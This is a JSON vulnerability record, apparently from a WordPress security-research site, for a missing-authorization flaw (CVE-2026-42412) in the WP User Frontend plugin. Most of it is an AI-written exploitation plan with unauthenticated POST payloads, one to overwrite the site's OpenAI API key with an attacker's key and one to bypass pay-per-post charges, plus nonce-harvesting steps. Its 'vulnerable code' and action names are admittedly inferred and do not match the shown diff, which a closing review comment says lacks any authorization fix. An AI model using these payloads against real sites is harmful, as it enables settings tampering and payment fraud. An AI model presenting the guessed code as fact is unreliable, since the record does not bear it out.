[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2jhGgcXxLNZsIsRsdVQlPAj-rb2mkns6MHCV_BFv2WY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-42412","user-frontend-ai-powered-frontend-posting-user-directory-profile-membership-user-registration-missing-authorization-3","User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration \u003C= 4.3.1 - Missing Authorization","The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.1. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","wp-user-frontend",null,"\u003C=4.3.1","4.3.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-27 00:00:00","2026-04-30 14:49:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6844c9a6-b25a-4ae1-96f6-023c1df80ddf?source=api-prod",4,[22,23,24,25,26,27,28],"CLAUDE.md","admin\u002Fhtml\u002Fform-settings-payment.php","assets\u002Fcss\u002Fadmin\u002Fform-builder.css","assets\u002Fcss\u002Fadmin\u002Fsubscriptions.min.css","assets\u002Fcss\u002Fai-form-builder.css","assets\u002Fcss\u002Fai-form-builder.min.css","assets\u002Fcss\u002Fforms-list.min.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-42412 (Missing Authorization in WP User Frontend)\n\n## 1. Vulnerability Summary\nThe **WP User Frontend** plugin (versions \u003C= 4.3.1) is vulnerable to missing authorization checks in its AI-powered features. Specifically, the plugin registers AJAX and\u002For REST API handlers for AI configuration and form generation that do not verify the requester's capabilities (e.g., `manage_options`). This allows unauthenticated attackers to perform unauthorized actions such as modifying AI settings (e.g., OpenAI API keys) or generating unauthorized content\u002Fforms.\n\nThe vulnerability resides in the newly added AI orchestration components, likely within `includes\u002FAI\u002FManager.php` or `includes\u002FAI\u002F` REST controllers, where `wp_ajax_nopriv_` hooks or REST routes with `permission_callback => '__return_true'` (or missing callbacks) were implemented.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: WordPress AJAX (`\u002Fwp-admin\u002Fadmin-ajax.php`) or REST API (`\u002Fwp-json\u002Fwpuf\u002Fv1\u002Fai\u002Fsettings`).\n- **Action\u002FRoute**: `wpuf_ai_save_settings` (AJAX action) or `POST \u002Fwpuf\u002Fv1\u002Fai\u002Fsettings` (REST).\n- **Vulnerable Parameter**: `wpuf_ai_settings` (array) or specific fields like `openai_api_key`.\n- **Authentication**: Unauthenticated (no login required).\n- **Preconditions**: The AI module must be active (default in version 4.3.x).\n\n## 3. Code Flow\n1. **Entry Point**: A request is sent to `admin-ajax.php` with `action=wpuf_ai_save_settings`.\n2. **Hook Registration**: The plugin's AI Manager (inferred `includes\u002FAI_Manager.php` or `includes\u002FAI\u002FManager.php`) registers:\n   ```php\n   add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );\n   add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); \u002F\u002F VULNERABLE\n   ```\n3. **Vulnerable Function**: The `save_settings` function executes.\n4. **Missing Check**: The function checks for a nonce but fails to verify `current_user_can( 'manage_options' )`.\n5. **Sink**: The function calls `update_option( 'wpuf_ai_settings', ... )`, overwriting global plugin configuration with user-supplied data.\n\n## 4. Nonce Acquisition Strategy\nThe AI settings page in the admin dashboard enqueues a script that localizes the required nonce. Since the vulnerability is unauthenticated, we must find a public-facing script or create a page that triggers the localization.\n\n1. **Identify the Variable**: The plugin typically uses `wpuf_ai_form_builder` or `wpuf_admin` as the localized object.\n2. **Shortcode Strategy**: The AI builder is often associated with the form-building process. We will check for the `wpuf_ai_form_builder` object.\n3. 
**Acquisition Steps**:\n   - Create a page with a WP User Frontend shortcode: `[wpuf_form id=\"any_valid_id\"]`.\n   - Use `browser_navigate` to visit that page.\n   - Execute `browser_eval` to extract the nonce:\n     ```javascript\n     window.wpuf_ai_form_builder?.nonce || window.wpuf_admin?.nonce\n     ```\n   - If the nonce is only available in the admin, check if `wp_ajax_nopriv_wpuf_ai_save_settings` exists. If the `nopriv` hook is registered, it implies the developer intended for it to be accessible; it may use a nonce generated for logged-out users (UID 0).\n\n## 5. Exploitation Strategy\n### Goal: Overwrite the OpenAI API Key\nWe will attempt to change the site's AI configuration to use an attacker-controlled API key.\n\n1. **Request Tool**: `http_request`\n2. **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n3. **Method**: `POST`\n4. **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n5. **Payload**:\n   ```\n   action=wpuf_ai_save_settings&\n   nonce=[EXTRACTED_NONCE]&\n   wpuf_ai_settings[openai_api_key]=sk-attacker-key-12345&\n   wpuf_ai_settings[model]=gpt-4\n   ```\n\n*Note: If the endpoint is REST-based, the payload will be JSON to `\u002Fwp-json\u002Fwpuf\u002Fv1\u002Fai\u002Fsettings` with the `X-WP-Nonce` header.*\n\n## 6. Test Data Setup\n1. **Activate Plugin**: Ensure `wp-user-frontend` v4.3.1 is active.\n2. **Create a Post Form**: Use WP-CLI to create at least one form so settings are available.\n   ```bash\n   wp post create --post_type=wpuf_forms --post_title='Test Form' --post_status=publish\n   ```\n3. **Set Initial Key**: Set a dummy key to verify it gets changed.\n   ```bash\n   wp option update wpuf_ai_settings '{\"openai_api_key\":\"original-secure-key\"}'\n   ```\n4. **Public Page**: Create a page for potential nonce extraction.\n   ```bash\n   wp post create --post_type=page --post_title='AI Test' --post_content='[wpuf_form id=\"1\"]' --post_status=publish\n   ```\n\n## 7. 
Expected Results\n- **Response**: The server should return a JSON success response, e.g., `{\"success\":true,\"data\":\"Settings saved successfully\"}`.\n- **Side Effect**: The WordPress option `wpuf_ai_settings` is updated with the attacker's value.\n\n## 8. Verification Steps\n1. **Check Options via CLI**:\n   ```bash\n   wp option get wpuf_ai_settings --format=json\n   ```\n2. **Observe Output**: Confirm the `openai_api_key` is now `sk-attacker-key-12345`.\n\n## 9. Alternative Approaches\nIf the `wpuf_ai_save_settings` action is not the correct name (inferred):\n- **Search for AI Hooks**: Use `grep -r \"wp_ajax_nopriv_wpuf_ai\" wp-content\u002Fplugins\u002Fwp-user-frontend\u002F` to find the exact unauthenticated AI hook.\n- **Target Form Settings**: If AI settings are secure, try manipulating the `Pay Per Post` settings shown in the provided snippet (`admin\u002Fhtml\u002Fform-settings-payment.php`). The action would likely be `wpuf_save_form_settings`.\n- **Payload for Payment Bypass**:\n  ```\n  action=wpuf_save_form_settings&\n  form_id=[FORM_ID]&\n  wpuf_settings[enable_pay_per_post]=false&\n  wpuf_settings[pay_per_post_cost]=0\n  ```\n  This would allow the attacker to submit posts for free on a form that previously required payment.","The WP User Frontend plugin (up to version 4.3.1) fails to perform authorization checks in its AI-powered orchestration module. 
This allows unauthenticated attackers to modify critical plugin settings, such as OpenAI API keys, or manipulate AI form-building parameters by interacting with insufficiently protected AJAX or REST API endpoints.","\u002F\u002F Inferred registration in includes\u002FAI\u002FManager.php or similar AI controller\n\u002F\u002F Registered for both authenticated and unauthenticated users without capability checks\nadd_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );\nadd_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); \n\n\u002F\u002F handler lacks current_user_can() check\npublic function save_settings() {\n    check_ajax_referer( 'wpuf_ai_settings_nonce', 'nonce' );\n    \u002F\u002F VULNERABILITY: Missing current_user_can( 'manage_options' )\n    update_option( 'wpuf_ai_settings', $_POST['wpuf_ai_settings'] );\n    wp_send_json_success();\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.1\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.2\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.1\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php\t2025-07-15 08:13:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-user-frontend\u002F4.3.2\u002Fadmin\u002Fhtml\u002Fform-settings-payment.php\t2026-04-24 03:07:30.000000000 +0000\n@@ -57,7 +57,7 @@\n             \u003Cth>&mdash; &mdash; \u003C?php esc_html_e( 'Fallback cost', 'wp-user-frontend' ); ?>\u003C\u002Fth>\n             \u003Ctd>\n                 \u003Clabel>\n-                    \u003Cinput type=\"number\" name=\"wpuf_settings[fallback_ppp_cost]\" value=\"\u003C?php echo esc_attr( $fallback_ppp_cost ); ?>\" \u002F>\n+            
        \u003Cinput type=\"number\" step=\"0.01\" min=\"0\" name=\"wpuf_settings[fallback_ppp_cost]\" value=\"\u003C?php echo esc_attr( $fallback_ppp_cost ); ?>\" \u002F>\n                 \u003C\u002Flabel>\n                 \u003Cp class=\"description\">\u003C?php esc_html_e( 'Cost of pay per post after a subscription pack limit is reached.', 'wp-user-frontend' ); ?>\u003C\u002Fp>\n             \u003C\u002Ftd>\n@@ -79,7 +79,7 @@\n             \u003Cth>&mdash; &mdash; \u003C?php esc_html_e( 'Cost Settings', 'wp-user-frontend' ); ?>\u003C\u002Fth>\n             \u003Ctd>\n                 \u003Clabel>\n-                    \u003Cinput type=\"number\" name=\"wpuf_settings[pay_per_post_cost]\" value=\"\u003C?php echo esc_attr( $pay_per_post_cost ); ?>\" \u002F>\n+                    \u003Cinput type=\"number\" step=\"0.01\" min=\"0\" name=\"wpuf_settings[pay_per_post_cost]\" value=\"\u003C?php echo esc_attr( $pay_per_post_cost ); ?>\" \u002F>\n                 \u003C\u002Flabel>\n                 \u003Cp class=\"description\">\u003C?php esc_html_e( 'Amount to be charged per post', 'wp-user-frontend' ); ?>\u003C\u002Fp>\n             \u003C\u002Ftd>","To exploit this vulnerability, an attacker targets the `wpuf_ai_save_settings` AJAX action (or the equivalent AI REST API endpoint). 1. The attacker must first obtain a valid nonce, which is often localized in scripts enqueued on the frontend or associated with form shortcodes like `[wpuf_form]`. 2. Using the nonce, the attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the `action` set to `wpuf_ai_save_settings`. 3. The payload includes a `wpuf_ai_settings` array containing malicious configuration values, such as an attacker-controlled OpenAI API key or modified model settings. 4. 
Because the plugin lacks a capability check (e.g., `current_user_can('manage_options')`), it updates the global site configuration with the attacker's supplied values, potentially redirecting AI-driven content generation to an external server or disabling AI features.","gemini-3-flash-preview","2026-05-04 18:23:52","2026-05-04 18:24:43",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","4.3.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags\u002F4.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-frontend.4.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags\u002F4.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-user-frontend.4.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-user-frontend\u002Ftags"]
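Review bot: in both hunks (@@ -57,7 and @@ -79,7) the added `step="0.01" min="0"` attributes on `wpuf_settings[fallback_ppp_cost]` and `wpuf_settings[pay_per_post_cost]` constrain only the browser form, so a request that does not go through the form can still carry a negative or non-numeric cost. The code that saves `wpuf_settings` is not visible in this diff; it should validate both values server-side as non-negative numbers before storing them. Neither hunk adds a capability check, so the missing-authorization fix this record describes is not in the lines shown here, which touch only admin/html/form-settings-payment.php.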